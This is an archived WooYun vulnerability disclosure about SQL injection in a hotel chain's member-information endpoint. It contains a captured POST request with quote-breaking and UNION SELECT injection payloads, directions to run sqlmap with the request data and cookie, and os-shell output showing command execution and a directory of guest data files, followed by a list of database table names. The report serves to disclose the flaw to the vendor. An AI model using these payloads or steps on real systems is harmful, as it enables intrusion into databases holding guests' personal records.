当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038106

漏洞标题:佳驿酒店存在SQL注射漏洞可查看开房记录与执行系统命令

相关厂商:jyhotels.com

漏洞作者: yofx

提交时间:2013-09-25 14:56

修复时间:2013-09-30 14:57

公开时间:2013-09-30 14:57

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-25: 细节已通知厂商并且等待厂商处理中
2013-09-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

第一发,后续还有。小伙伴们你和你的小女朋友去开房了没?

详细说明:

该漏洞隐藏比较深,存在于登陆后的用户信息页面。要重现漏洞,首先注册用户,登陆后,来到如下:

http://[马赛克].com/hy_hyxx.asp


我们随便修改一个其中的字段,比如电话,通过抓包即可获得如下信息:
头信息:

POST /interface/GetCardInfoto.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://[马赛克].com/hy_hyxx.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; qdesk 2.5.1277.202; Windows NT 6.1; WOW64; Trident/6.0; EIE10;ZHCNMSE)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 226
DNT: 1
Host: [马赛克].com
Pragma: no-cache
Cookie: ASPSESSIONIDQQARACTT=IMIFFNABNOMDGJOPCLMCIKHN; __utma=151624807.147161778.1380073670.1380073670.1380073670.1; __utmb=151624807.1.10.1380073670; __utmc=151624807; __utmz=151624807.1380073670.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CNZZDATA2483714=cnzz_eid%3D1610132666-1380073670-http%253A%252F%252F[马赛克].com%26ntime%3D1380073670%26cnzz_a%3D0%26retime%3D1380073671094%26sin%3D%26ltime%3D1380073671094%26rtime%3D0; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; Hm_lvt_5bc7cb98a65977d60bcfcef84a320f0f=1380073671; Hm_lpvt_5bc7cb98a65977d60bcfcef84a320f0f=1380073671


post信息:

Password=我是马赛克&no=我是马赛克&sex=%C4%D0&mobile=我是马赛克&phone=1234%2527and+1%3D1&emaile=1fsdf@qq.com&street=-5057+UNION+ALL+SELECT+CONCAT%280x7177766271%2C0x637a4b7169577a787748%2C0x71786a6b71%29%23&zip=&button2=%D0%DE%B8%C4


额里面有我的测试语句 勿怪。。呵呵
接下来放到sqlmap里面跑吧。。设定好data和cookie即可。
漏洞页面是存在于

/interface/GetCardInfoto.asp

这里的,未对提交参数过滤导致注入脱裤。
稍微看了下积分系统。。可以兑换东西。。。这个。。。。赶紧修复吧。。我什么都没改。

漏洞证明:

1.png


确实可以注入而且是DBA

2.png


可以执行cmd命令 不是系统权限

3.png


command standard output:
---
驱动器 C 中的卷没有标签。
卷的序列号是 B8BB-9F62

c:\data 的目录

2012/03/17 12:24 <DIR> .
2012/03/17 12:24 <DIR> ..
2012/03/17 11:23 28,784,339 guest_card.out
2012/03/17 11:49 194,312,036 guest_income.out
2012/03/17 11:25 145,380,327 hmaster.out
2012/03/17 11:25 1,383,091 master.out
2012/03/17 11:27 133,089,417 master_detail_crs.out
2012/03/17 11:27 13,083,788 master_hotel.out
2012/03/17 11:27 458,880 master_hung.out
2012/03/17 11:31 275,499,065 master_log.out
2012/03/17 11:43 2,576,718 operatelog.out
2012/03/17 11:31 2,388,728 rmamount.out
2012/03/17 11:31 19,097,772 sms_send.out
2012/03/17 11:50 107,318,465 vipcard.out
2012/03/17 11:37 263,730,610 vippoint.out
2012/03/17 11:33 112,167,003 vip_xf.out
2012/03/17 11:37 8,333,601 ycus_xf_crs.out
2012/03/17 11:43 308,959,445 yjourrep_crs.out
2012/03/17 11:45 111,480,400 yjourrep_crs_inzone.out
2012/03/17 11:43 6,890,456 ymktsummaryrep_crs.out
18 个文件 1,734,934,141 字节
2 个目录 55,046,377,472 可用字节
---
os-shell>


数据库:

Database: InZoneCRS
[309 tables]
+---------------------------------+
| Authority |
| Classify |
| List |
| PMS_HOTEL_JOB_LINK |
| PMS_JOB_DETAILS |
| PMS_TASK_DETAILS |
| Param |
| Query |
| QueryAuthorityRelation |
| Queue_Consume |
| UserQueryRelation |
| accredit |
| accthead |
| addservices |
| aging_report |
| alerts |
| allot_task |
| allot_tasklist |
| allotment_item |
| allotment_remain |
| allotment_type |
| allotment_use |
| ar_apply |
| ar_detail |
| ar_detail_des |
| ar_detail_des_till |
| ar_master |
| argst |
| audit_date |
| auth_right |
| auth_role |
| auto_dept |
| auto_empno |
| auto_rep_link |
| auto_report |
| basecode |
| basecode_cat |
| blkmst |
| caiwu_kjkm |
| caiwu_pz |
| cancel_rule |
| channel_change_log |
| channel_rate_availability |
| channel_rate_publish |
| channel_ratecode_mapping |
| channel_room_publish |
| cmscode_crs |
| cntcode |
| countrycode |
| crs_company |
| crs_company_temp |
| crs_daily_report |
| crs_daily_report_tmp |
| crs_download_log |
| crs_emp_reserve |
| crs_night_audit |
| crs_night_audit_tmp |
| crs_shift |
| crs_syncctrl |
| crs_web_order_stat |
| cti_phone_crs |
| data_upload |
| depcxl_rec |
| deposit_mapfield |
| deposit_method |
| deposit_rule |
| dictate_crs |
| download_guest |
| ee |
| exclude_data |
| fec_currency |
| fox_point_condition_rule_code |
| fox_relationship |
| fox_rule_action |
| fox_rule_exp |
| fox_rule_onwership |
| fox_rule_set |
| fox_workbench |
| fox_workbench_cat |
| fox_workbench_ui |
| foxhotkey |
| foxlangid |
| gate |
| gdsmsg |
| glx_crs_report |
| greeting |
| grp_ReportTemplate |
| grp_base_hotel |
| grp_base_hotel1 |
| grp_data_des |
| grp_data_link |
| grp_prom |
| grp_prom_log |
| grp_prom_ratecode |
| grp_prom_rule |
| grp_templateCatalog |
| gtype |
| gtype_crs |
| gtype_crs_log |
| guest |
| guest_1 |
| guest_2 |
| guest_back |
| guest_back1 |
| guest_card |
| guest_card_list_view |
| guest_card_type |
| guest_cpl |
| guest_date |
| guest_del |
| guest_diary |
| guest_extra |
| guest_extra_crs |
| guest_income |
| guest_income_audit_log |
| guest_income_des |
| guest_income_des_till |
| guest_income_pool |
| guest_log |
| guest_prefer |
| guest_prefer_view |
| guest_ratecode |
| guest_xfttl |
| hmaster |
| hotel_register |
| hotelinfo |
| hotelinfo_email |
| jiayi_house_status |
| lgfl |
| lgfl_des |
| macro_set |
| master |
| master_des |
| master_detail_crs |
| master_detail_loger_crs |
| master_guest |
| master_hotel |
| master_hung |
| master_log |
| messages_crs |
| mjourrep_crs |
| mktcode |
| mooncake |
| notify_queue_view |
| notify_template |
| operatelog |
| package |
| package_detail |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| pccode |
| pcid_des |
| pinyin |
| pos_mode_name |
| print_template |
| promotion_crs |
| prvcode |
| reason |
| repDataGrid |
| repParam |
| repParams |
| repParamsDef |
| repReport |
| repTemplate |
| repempnolink |
| reqcode |
| restriction |
| restype |
| rmamount |
| rmamount_log |
| rmamount_src |
| rmratecat |
| rmratecode |
| rmratecode_allotmenttype |
| rmratecode_link |
| rmratecode_log |
| rmratecode_log_link |
| rmratedef |
| rmratedef_everyday |
| rmratedef_log |
| role_right |
| rsvsrc |
| rsvsrc_X |
| rsvsrc_detail |
| saleid |
| sms_pattern |
| sms_send |
| sqlmapoutput |
| srccode |
| statistic_c |
| statistic_i |
| statistic_m |
| statistic_p |
| statistic_t |
| statistic_y |
| sys_actor_role |
| sys_emp_role |
| sys_empno |
| sys_extraid |
| sys_function |
| sys_function_dtl |
| sys_history |
| sys_rep_link |
| sys_role |
| sys_seq_no |
| sysdata |
| sysdefault |
| sysdiagrams |
| sysoption |
| sysoption1 |
| task |
| tasklist |
| temp_1 |
| temp_card_1 |
| temp_card_period |
| temp_guest |
| templateCatalog |
| test |
| test_111 |
| typim_crs |
| typim_crs_log |
| umAuthor |
| umMainModule |
| umRole |
| umRoleAuthor |
| umSubModule |
| user_account |
| user_role |
| vip_updown_term |
| vip_xf |
| vipcard |
| vipcard1 |
| vipcard_aircard_point |
| vipcard_batch_detail |
| vipcard_batch_histroy |
| vipcard_card_type |
| vipcard_consume |
| vipcard_consume_1 |
| vipcard_consume_dtls |
| vipcard_des |
| vipcard_des_till |
| vipcard_freeze_sumpoint_view |
| vipcard_goods |
| vipcard_goods_category |
| vipcard_goods_delivery |
| vipcard_goods_inout |
| vipcard_goods_inout_history |
| vipcard_goods_provider |
| vipcard_log |
| vipcard_loss |
| vipcard_master |
| vipcard_master_detail |
| vipcard_member_info_view |
| vipcard_point |
| vipcard_point_change_details |
| vipcard_point_exchange |
| vipcard_point_exchange_dtls |
| vipcard_point_formula |
| vipcard_point_freeze |
| vipcard_point_lost |
| vipcard_point_period |
| vipcard_point_period0808 |
| vipcard_point_period1 |
| vipcard_point_period10 |
| vipcard_point_period11 |
| vipcard_point_period12 |
| vipcard_pool |
| vipcard_potential_member |
| vipcard_potential_member_income |
| vipcard_snapshot |
| vipcard_snapshot_till |
| vipcard_top_nroom_view |
| vipcard_top_stay_view |
| vipcard_type |
| vipcard_updown |
| vipcard_upgrate_notfiy |
| vipcard_workbench_data |
| vipcard_workbench_data_card |
| vipcard_writelog |
| vipcard_yjourrep_link |
| vippoint |
| vippoint_des |
| vippoint_des_till |
| vippoint_view |
| vipstat_rep |
| xlm_temp |
| yaudit_impdata_crs |
| ycaiwu_jiayi |
| ycashrep_crs |
| ycrs_reserve_statistic |
| ycrs_reserve_statistic1 |
| ycrs_reserve_statistic_cat |
| ycrs_statistic |
| ycus_xf_crs |
| ydairep_crs |
| ygststa1_crs |
| ygststa_crs |
| yjierep_crs |
| yjourrep_class_link |
| yjourrep_crs |
| yjourrep_crs_inzone |
| yjourrep_crs_link |
| ymktsummaryrep_crs |
| ynjourrep_crs |
| yrmsalerep_crs |
| yunying_report |
+---------------------------------+


修复方案:

即便是POST也应该过滤丫。。

版权声明:转载请注明来源 yofx@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-30 14:57

厂商回复:

漏洞Rank:9 (WooYun评价)

最新状态:

暂无